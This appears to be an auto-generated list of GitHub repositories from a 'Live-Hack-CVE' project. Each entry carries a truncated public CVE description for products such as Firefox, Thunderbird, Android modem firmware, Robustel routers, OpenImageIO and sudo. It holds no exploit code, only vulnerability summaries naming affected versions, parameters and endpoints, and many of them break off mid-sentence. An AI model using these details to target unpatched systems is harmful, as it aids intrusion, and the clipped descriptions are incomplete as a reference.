**A logic issue was addressed with improved state management. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2. An app may be able to use arbitrary entitlements. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42855](https://github.com/Live-Hack-CVE/CVE-2022-42855) create time: 2022-12-27T12:10:35Z

**In Pixel cellular firmware, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239239246References: CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20608](https://github.com/Live-Hack-CVE/CVE-2022-20608) create time: 2022-12-27T12:10:12Z

**In Pixel cellular firmware, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239240808References: N/A CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20609](https://github.com/Live-Hack-CVE/CVE-2022-20609) create time: 2022-12-27T12:10:08Z

**In cellular modem firmware, there is a possible out of bounds read due to a missing bounds check. This could lead to remote code execution with LTE authentication needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-240462530References: N/A CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20610](https://github.com/Live-Hack-CVE/CVE-2022-20610) create time: 2022-12-27T12:10:05Z

**An unauthenticated user can access Identity Manager’s management console specific page URLs. However, the system doesn’t allow the user to carry out server side tasks without a valid web session. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25626](https://github.com/Live-Hack-CVE/CVE-2022-25626) create time: 2022-12-27T12:10:02Z

**An authenticated administrator who has physical access to the environment can carry out Remote Command Execution on Management Console in Symantec Identity Manager 14.4 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25627](https://github.com/Live-Hack-CVE/CVE-2022-25627) create time: 2022-12-27T12:09:58Z

**In ProtocolCallBuilder::BuildSendUssd of protocolcallbuilder.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42508](https://github.com/Live-Hack-CVE/CVE-2022-42508) create time: 2022-12-27T12:09:55Z

**An authenticated user can perform XML eXternal Entity injection in Management Console in Symantec Identity Manager 14.4 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25628](https://github.com/Live-Hack-CVE/CVE-2022-25628) create time: 2022-12-27T12:09:51Z

**In CallDialReqData::encode of callreqdata.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-241544307R CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42509](https://github.com/Live-Hack-CVE/CVE-2022-42509) create time: 2022-12-27T12:09:48Z

**In StringsRequestData::encode of requestdata.cpp, there is a possible out of bounds read due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-24176 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42510](https://github.com/Live-Hack-CVE/CVE-2022-42510) create time: 2022-12-27T12:09:44Z

**Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the entrys parameter at /goform/RouteStatic. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46546](https://github.com/Live-Hack-CVE/CVE-2022-46546) create time: 2022-12-27T12:09:41Z

**Todd Miller's sudo version 1.8.20 and earlier is vulnerable to an input validation (embedded spaces) in the get_process_ttyname() function resulting in information disclosure and command execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-1000367](https://github.com/Live-Hack-CVE/CVE-2017-1000367) create time: 2022-12-27T10:37:17Z

**An OAuth session fixation vulnerability existed in the VPN login flow, where an attacker could craft a custom login URL, convince a VPN user to login via that URL, and obtain authenticated access as that user. This issue is limited to cases where attacker and victim are sharing the same source IP and could allow the ab CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15679](https://github.com/Live-Hack-CVE/CVE-2020-15679) create time: 2022-12-27T10:47:12Z

**During the plaintext phase of the STARTTLS connection setup, protocol commands could have been injected and evaluated within the encrypted session. This vulnerability affects Thunderbird < 78.7. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15685](https://github.com/Live-Hack-CVE/CVE-2020-15685) create time: 2022-12-27T10:46:54Z

**is.js is a general-purpose check library. Versions 0.9.0 and prior contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). is.js uses a regex copy-pasted from a gist to validate URLs. Trying to validate a malicious string can cause the regex to loop “forever." This CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26302](https://github.com/Live-Hack-CVE/CVE-2020-26302) create time: 2022-12-27T10:37:39Z

**Mozilla developers and community members Julian Hector, Randell Jesup, Gabriele Svelto, Tyson Smith, Christian Holler, and Masayuki Nakano reported memory safety bugs present in Firefox 94. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been explo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4129](https://github.com/Live-Hack-CVE/CVE-2021-4129) create time: 2022-12-27T10:47:24Z

**An out of date graphics library (Angle) likely contained vulnerabilities that could potentially be exploited. This vulnerability affects Thunderbird < 78.9 and Firefox ESR < 78.9. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4127](https://github.com/Live-Hack-CVE/CVE-2021-4127) create time: 2022-12-27T10:47:20Z

**When receiving an OpenPGP/MIME signed email message that contains an additional outer MIME message layer, for example a message footer added by a mailing list gateway, Thunderbird only considered the inner signed message for the signature validity. This gave the false impression that the additional contents were also c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4126](https://github.com/Live-Hack-CVE/CVE-2021-4126) create time: 2022-12-27T10:47:16Z

**It was possible to construct specific XSLT markup that would be able to bypass an iframe sandbox. This vulnerability affects Firefox ESR < 91.5, Firefox < 96, and Thunderbird < 91.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4140](https://github.com/Live-Hack-CVE/CVE-2021-4140) create time: 2022-12-27T10:47:02Z

**When transitioning in and out of fullscreen mode, a graphics object was not correctly protected; resulting in memory corruption and a potentially exploitable crash.<br>*This bug only affects Firefox on MacOS. Other operating systems are unaffected.*. This vulnerability affects Firefox < 95. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4128](https://github.com/Live-Hack-CVE/CVE-2021-4128) create time: 2022-12-27T10:46:58Z

**Mozilla developers Calixte Denizet, Kershaw Chang, Christian Holler, Jason Kratzer, Gabriele Svelto, Tyson Smith, Simon Giesecke, and Steve Fink reported memory safety bugs present in Firefox 95 and Firefox ESR 91.4. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22751](https://github.com/Live-Hack-CVE/CVE-2022-22751) create time: 2022-12-27T10:48:45Z

**Malicious websites could have confused Firefox into showing the wrong origin when asking to launch a program and handling an external URL protocol. This vulnerability affects Firefox ESR < 91.5, Firefox < 96, and Thunderbird < 91.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22748](https://github.com/Live-Hack-CVE/CVE-2022-22748) create time: 2022-12-27T10:48:42Z

**After accepting an untrusted certificate, handling an empty pkcs7 sequence as part of the certificate data could have lead to a crash. This crash is believed to be unexploitable. This vulnerability affects Firefox ESR < 91.5, Firefox < 96, and Thunderbird < 91.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22747](https://github.com/Live-Hack-CVE/CVE-2022-22747) create time: 2022-12-27T10:48:38Z

**Securitypolicyviolation events could have leaked cross-origin information for frame-ancestors violations. This vulnerability affects Firefox ESR < 91.5, Firefox < 96, and Thunderbird < 91.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22745](https://github.com/Live-Hack-CVE/CVE-2022-22745) create time: 2022-12-27T10:48:35Z

**When navigating from inside an iframe while requesting fullscreen access, an attacker-controlled tab could have made the browser unable to leave fullscreen mode. This vulnerability affects Firefox ESR < 91.5, Firefox < 96, and Thunderbird < 91.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22743](https://github.com/Live-Hack-CVE/CVE-2022-22743) create time: 2022-12-27T10:48:32Z

**When inserting text while in edit mode, some characters might have lead to out-of-bounds memory access causing a potentially exploitable crash. This vulnerability affects Firefox ESR < 91.5, Firefox < 96, and Thunderbird < 91.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22742](https://github.com/Live-Hack-CVE/CVE-2022-22742) create time: 2022-12-27T10:48:28Z

**Certain network request objects were freed too early when releasing a network request handle. This could have lead to a use-after-free causing a potentially exploitable crash. This vulnerability affects Firefox ESR < 91.5, Firefox < 96, and Thunderbird < 91.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22740](https://github.com/Live-Hack-CVE/CVE-2022-22740) create time: 2022-12-27T10:48:24Z

**Applying a CSS filter effect could have accessed out of bounds memory. This could have lead to a heap-buffer-overflow causing a potentially exploitable crash. This vulnerability affects Firefox ESR < 91.5, Firefox < 96, and Thunderbird < 91.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22738](https://github.com/Live-Hack-CVE/CVE-2022-22738) create time: 2022-12-27T10:48:20Z

**Constructing audio sinks could have lead to a race condition when playing audio files and closing windows. This could have lead to a use-after-free causing a potentially exploitable crash. This vulnerability affects Firefox ESR < 91.5, Firefox < 96, and Thunderbird < 91.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22737](https://github.com/Live-Hack-CVE/CVE-2022-22737) create time: 2022-12-27T10:48:17Z

**IBM Security Verify Governance, Identity Manager 10.0.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 225007. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22461](https://github.com/Live-Hack-CVE/CVE-2022-22461) create time: 2022-12-27T10:48:14Z

**If an attacker was able to corrupt the methods of an Array object in JavaScript via prototype pollution, they could have achieved execution of attacker-controlled JavaScript code in a privileged context. This vulnerability affects Firefox ESR < 91.9.1, Firefox < 100.0.2, Firefox for Android < 100.3.0, and Thunderbird < CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1802](https://github.com/Live-Hack-CVE/CVE-2022-1802) create time: 2022-12-27T10:48:10Z

**When viewing an email message A, which contains an attached message B, where B is encrypted or digitally signed or both, Thunderbird may show an incorrect encryption or signature status. After opening and viewing the attached message B, when returning to the display of message A, the message A might be shown with the s CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1520](https://github.com/Live-Hack-CVE/CVE-2022-1520) create time: 2022-12-27T10:48:07Z

**When importing a revoked key that specified key compromise as the revocation reason, Thunderbird did not update the existing copy of the key that was not yet revoked, and the existing key was kept as non-revoked. Revocation statements that used another revocation reason, or that didn't specify a revocation reason, were CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1197](https://github.com/Live-Hack-CVE/CVE-2022-1197) create time: 2022-12-27T10:48:04Z

**<code>NSSToken</code> objects were referenced via direct points, and could have been accessed in an unsafe way on different threads, leading to a use-after-free and potentially exploitable crash. This vulnerability affects Thunderbird < 91.8, Firefox < 99, and Firefox ESR < 91.8. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1097](https://github.com/Live-Hack-CVE/CVE-2022-1097) create time: 2022-12-27T10:47:34Z

**It may be possible for an attacker to craft an email message that causes Thunderbird to perform an out-of-bounds write of one byte when processing the message. This vulnerability affects Thunderbird < 91.6.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0566](https://github.com/Live-Hack-CVE/CVE-2022-0566) create time: 2022-12-27T10:47:31Z

**Mozilla developers and community members Gabriele Svelto, Sebastian Hengst, Randell Jesup, Luan Herrera, Lars T Hansen, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 96. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0511](https://github.com/Live-Hack-CVE/CVE-2022-0511) create time: 2022-12-27T10:47:27Z

**CodeIgniter is a PHP full-stack web framework. This vulnerability may allow attackers to spoof their IP address when the server is behind a reverse proxy. This issue has been patched, please upgrade to version 4.2.11 or later, and configure `Config\App::$proxyIPs`. As a workaround, do not use `$request->getIPAddress()` CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23556](https://github.com/Live-Hack-CVE/CVE-2022-23556) create time: 2022-12-27T10:47:09Z

**After a VR Process is destroyed, a reference to it may have been retained and used, leading to a use-after-free and potentially exploitable crash. This vulnerability affects Thunderbird < 91.8 and Firefox ESR < 91.8. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1196](https://github.com/Live-Hack-CVE/CVE-2022-1196) create time: 2022-12-27T10:47:05Z

**CodeIgniter is a PHP full-stack web framework. When an application uses (1) multiple session cookies (e.g., one for user pages and one for admin pages) and (2) a session handler is set to `DatabaseHandler`, `MemcachedHandler`, or `RedisHandler`, then if an attacker gets one session cookie (e.g., one for user pages), th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46170](https://github.com/Live-Hack-CVE/CVE-2022-46170) create time: 2022-12-27T10:46:51Z

**In versions `<=8.5.1` of `jsonwebtoken` library, lack of algorithm definition in the `jwt.verify()` function can lead to signature validation bypass due to defaulting to the `none` algorithm for signature verification. Users are affected if you do not specify algorithms in the `jwt.verify()` function. This issue has be CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23540](https://github.com/Live-Hack-CVE/CVE-2022-23540) create time: 2022-12-27T10:46:48Z

**Use tables inside of an iframe, an attacker could have caused iframe contents to be rendered outside the boundaries of the iframe, resulting in potential user confusion or spoofing attacks. This vulnerability affects Firefox ESR < 102.5, Thunderbird < 102.5, and Firefox < 107. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45420](https://github.com/Live-Hack-CVE/CVE-2022-45420) create time: 2022-12-27T10:46:44Z

**If a custom mouse cursor is specified in CSS, under certain circumstances the cursor could have been drawn over the browser UI, resulting in potential user confusion or spoofing attacks. This vulnerability affects Firefox ESR < 102.5, Thunderbird < 102.5, and Firefox < 107. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45418](https://github.com/Live-Hack-CVE/CVE-2022-45418) create time: 2022-12-27T10:46:41Z

**Service Workers did not detect Private Browsing Mode correctly in all cases, which could have led to Service Workers being written to disk for websites visited in Private Browsing Mode. This would not have persisted them in a state where they would run again, but it would have leaked Private Browsing Mode details to di CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45417](https://github.com/Live-Hack-CVE/CVE-2022-45417) create time: 2022-12-27T10:46:37Z

**Keyboard events reference strings like "KeyA" that were at fixed, known, and widely-spread addresses. Cache-based timing attacks such as Prime+Probe could have possibly figured out which keys were being pressed. This vulnerability affects Firefox ESR < 102.5, Thunderbird < 102.5, and Firefox < 107. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45416](https://github.com/Live-Hack-CVE/CVE-2022-45416) create time: 2022-12-27T10:46:33Z

**When downloading an HTML file, if the title of the page was formatted as a filename with a malicious extension, Firefox may have saved the file with that extension, leading to possible system compromise if the downloaded file was later ran. This vulnerability affects Firefox < 107. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45415](https://github.com/Live-Hack-CVE/CVE-2022-45415) create time: 2022-12-27T10:46:30Z

**If a Thunderbird user quoted from an HTML email, for example by replying to the email, and the email contained either a VIDEO tag with the POSTER attribute or an OBJECT tag with a DATA attribute, a network request to the referenced remote URL was performed, regardless of a configuration to block remote content. An imag CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45414](https://github.com/Live-Hack-CVE/CVE-2022-45414) create time: 2022-12-27T10:46:26Z

**Using the <code>S.browser_fallback_url parameter</code> parameter, an attacker could redirect a user to a URL and cause SameSite=Strict cookies to be sent.<br>*This issue only affects Firefox for Android. Other operating systems are not affected.*. This vulnerability affects Firefox < 107. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45413](https://github.com/Live-Hack-CVE/CVE-2022-45413) create time: 2022-12-27T10:46:22Z

**Cross-Site Tracing occurs when a server will echo a request back via the Trace method, allowing an XSS attack to access to authorization headers and cookies inaccessible to JavaScript (such as cookies protected by HTTPOnly). To mitigate this attack, browsers placed limits on <code>fetch()</code> and XMLHttpRequest; how CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45411](https://github.com/Live-Hack-CVE/CVE-2022-45411) create time: 2022-12-27T10:46:19Z

**When a ServiceWorker intercepted a request with <code>FetchEvent</code>, the origin of the request was lost after the ServiceWorker took ownership of it. This had the effect of negating SameSite cookie protections. This was addressed in the spec and then in browsers. This vulnerability affects Firefox ESR < 102.5, Thun CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45410](https://github.com/Live-Hack-CVE/CVE-2022-45410) create time: 2022-12-27T10:46:15Z

**If an attacker loaded a font using <code>FontFace()</code> on a background worker, a use-after-free could have occurred, leading to a potentially exploitable crash. This vulnerability affects Firefox < 107. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45407](https://github.com/Live-Hack-CVE/CVE-2022-45407) create time: 2022-12-27T10:46:12Z

**WP-Ban plugin before 1.6.4 for WordPress, when running in certain configurations, allows remote attackers to bypass the IP blacklist via a crafted X-Forwarded-For header. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6230](https://github.com/Live-Hack-CVE/CVE-2014-6230) create time: 2022-12-27T10:02:11Z

**Knex Knex.js through 2.3.0 has a limited SQL injection vulnerability that can be exploited to ignore the WHERE clause of a SQL query. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-20018](https://github.com/Live-Hack-CVE/CVE-2016-20018) create time: 2022-12-27T09:25:10Z

**A vulnerability has been identified in Micro Focus ZENworks 2020 Update 3a and prior versions. This vulnerability allows administrators with rights to perform actions (e.g., install a bundle) on a set of managed devices, to be able to exercise these rights on managed devices in the ZENworks zone but which are outside t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38757](https://github.com/Live-Hack-CVE/CVE-2022-38757) create time: 2022-12-27T10:01:26Z

**A vulnerability in the authorization controls for the Cisco IOx application hosting infrastructure in Cisco IOS XE Software could allow an unauthenticated, remote attacker to execute Cisco IOx API commands without proper authorization. The vulnerability is due to incorrect handling of requests for authorization tokens. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-3227](https://github.com/Live-Hack-CVE/CVE-2020-3227) create time: 2022-12-27T10:00:45Z

**A vulnerability in the Cisco Discovery Protocol implementation for Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to execute arbitrary code or cause a reload on an affected device. The vulnerability is due to improper validation of string input from certain fields in Cisco Discovery Protocol me CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-3118](https://github.com/Live-Hack-CVE/CVE-2020-3118) create time: 2022-12-27T10:00:38Z

**A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by block CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35476](https://github.com/Live-Hack-CVE/CVE-2020-35476) create time: 2022-12-27T10:00:02Z

**A vulnerability was found in Brondahl EnumStringValues up to 4.0.0. It has been declared as problematic. This vulnerability affects the function GetStringValuesWithPreferences_Uncache of the file EnumStringValues/EnumExtensions.cs. The manipulation leads to resource consumption. Upgrading to version 4.0.1 is able to ad CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36620](https://github.com/Live-Hack-CVE/CVE-2020-36620) create time: 2022-12-27T09:18:26Z

**A vulnerability was found in ahorner text-helpers up to 1.0.x. It has been declared as critical. This vulnerability affects unknown code of the file lib/text_helpers/translation.rb. The manipulation of the argument link leads to use of web link to untrusted target with window.opener access. The attack can be initiated CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36624](https://github.com/Live-Hack-CVE/CVE-2020-36624) create time: 2022-12-27T09:18:16Z

**Activity Watch is a free and open-source automated time tracker. Versions prior to 0.11.0 allow an attacker to execute arbitrary commands on any macOS machine with ActivityWatch running. The attacker can exploit this vulnerability by having the user visiting a website with the page title set to a malicious string. An a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32692](https://github.com/Live-Hack-CVE/CVE-2021-32692) create time: 2022-12-27T10:03:31Z

**In Squid 3.x through 3.5.28, 4.x through 4.17, and 5.x before 5.6, due to improper buffer management, a Denial of Service can occur when processing long Gopher server responses. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46784](https://github.com/Live-Hack-CVE/CVE-2021-46784) create time: 2022-12-27T10:02:01Z

**VMware Tools for Windows (12.x.y prior to 12.1.5, 11.x.y and 10.x.y) contains a denial-of-service vulnerability in the VM3DMP driver. A malicious actor with local user privileges in the Windows guest OS, where VMware Tools is installed, can trigger a PANIC in the VM3DMP driver leading to a denial-of-service condition i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31693](https://github.com/Live-Hack-CVE/CVE-2021-31693) create time: 2022-12-27T10:01:43Z

**The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the .end() method. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33623](https://github.com/Live-Hack-CVE/CVE-2021-33623) create time: 2022-12-27T10:00:24Z

**If a domain name contained a RTL character, it would cause the domain to be rendered to the right of the path. This could lead to user confusion and spoofing attacks. <br>*This bug only affects Firefox for Android. Other operating systems are unaffected.*<br>*Note*: Due to a clerical error this advisory was not include CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4221](https://github.com/Live-Hack-CVE/CVE-2021-4221) create time: 2022-12-27T09:20:07Z

**A vulnerability classified as problematic has been found in cgriego active_attr up to 0.15.2. This affects the function call of the file lib/active_attr/typecasting/boolean_typecaster.rb of the component Regex Handler. The manipulation of the argument value leads to denial of service. The exploit has been disclosed to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4250](https://github.com/Live-Hack-CVE/CVE-2021-4250) create time: 2022-12-27T09:18:43Z

**A vulnerability was found in phpRedisAdmin up to 1.16.1. It has been classified as problematic. This affects the function authHttpDigest of the file includes/login.inc.php. The manipulation of the argument response leads to use of wrong operator in string comparison. Upgrading to version 1.16.2 is able to address this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4259](https://github.com/Live-Hack-CVE/CVE-2021-4259) create time: 2022-12-27T09:18:36Z

**A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_e2c_json_fi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35269](https://github.com/Live-Hack-CVE/CVE-2022-35269) create time: 2022-12-27T10:07:12Z

**A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_sdk_file/` CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35268](https://github.com/Live-Hack-CVE/CVE-2022-35268) create time: 2022-12-27T10:07:09Z

**A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_https_cert_ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35267](https://github.com/Live-Hack-CVE/CVE-2022-35267) create time: 2022-12-27T10:07:06Z

**A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_firmware/` CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35266](https://github.com/Live-Hack-CVE/CVE-2022-35266) create time: 2022-12-27T10:07:02Z

**A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_nodejs_app/ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35265](https://github.com/Live-Hack-CVE/CVE-2022-35265) create time: 2022-12-27T10:06:58Z

**A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_authorized_ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35261](https://github.com/Live-Hack-CVE/CVE-2022-35261) create time: 2022-12-27T10:06:55Z

**A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_wireguard_c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35270](https://github.com/Live-Hack-CVE/CVE-2022-35270) create time: 2022-12-27T10:06:51Z

**A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_aaa_cert_fi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35264](https://github.com/Live-Hack-CVE/CVE-2022-35264) create time: 2022-12-27T10:06:48Z

**A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_file/` API. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35263](https://github.com/Live-Hack-CVE/CVE-2022-35263) create time: 2022-12-27T10:06:44Z

**A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_xml_file/` CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35262](https://github.com/Live-Hack-CVE/CVE-2022-35262) create time: 2022-12-27T10:06:41Z

**A buffer overflow was discovered in NTFS-3G before 2022.10.3. Crafted metadata in an NTFS image can cause code execution. A local attacker can exploit this if the ntfs-3g binary is setuid root. A physically proximate attacker can exploit this if NTFS-3G software is configured to execute upon attachment of an external s CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40284](https://github.com/Live-Hack-CVE/CVE-2022-40284) create time: 2022-12-27T10:06:09Z

**A flaw incorrect access control in the Linux kernel USB core subsystem was found in the way user attaches usb device. A local user could use this flaw to crash the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4662](https://github.com/Live-Hack-CVE/CVE-2022-4662) create time: 2022-12-27T10:06:06Z

**A denial of service vulnerability exists in the ZfileOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to denial of service. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43603](https://github.com/Live-Hack-CVE/CVE-2022-43603) create time: 2022-12-27T10:06:02Z

**Multiple code execution vulnerabilities exist in the IFFOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to a heap buffer overflow. An attacker can provide malicious input to trigger these vulnerabilities.This vulnerability arises when the `ymax` CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43602](https://github.com/Live-Hack-CVE/CVE-2022-43602) create time: 2022-12-27T10:05:58Z

**Multiple code execution vulnerabilities exist in the IFFOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to a heap buffer overflow. An attacker can provide malicious input to trigger these vulnerabilities.This vulnerability arises when the `ymax` CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43601](https://github.com/Live-Hack-CVE/CVE-2022-43601) create time: 2022-12-27T10:05:55Z

**Multiple code execution vulnerabilities exist in the IFFOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to a heap buffer overflow. An attacker can provide malicious input to trigger these vulnerabilities.This vulnerability arises when the `xmax` CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43600](https://github.com/Live-Hack-CVE/CVE-2022-43600) create time: 2022-12-27T10:05:52Z

**Multiple code execution vulnerabilities exist in the IFFOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to a heap buffer overflow. An attacker can provide malicious input to trigger these vulnerabilities.This vulnerability arises when the `xmax` CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43599](https://github.com/Live-Hack-CVE/CVE-2022-43599) create time: 2022-12-27T10:05:48Z

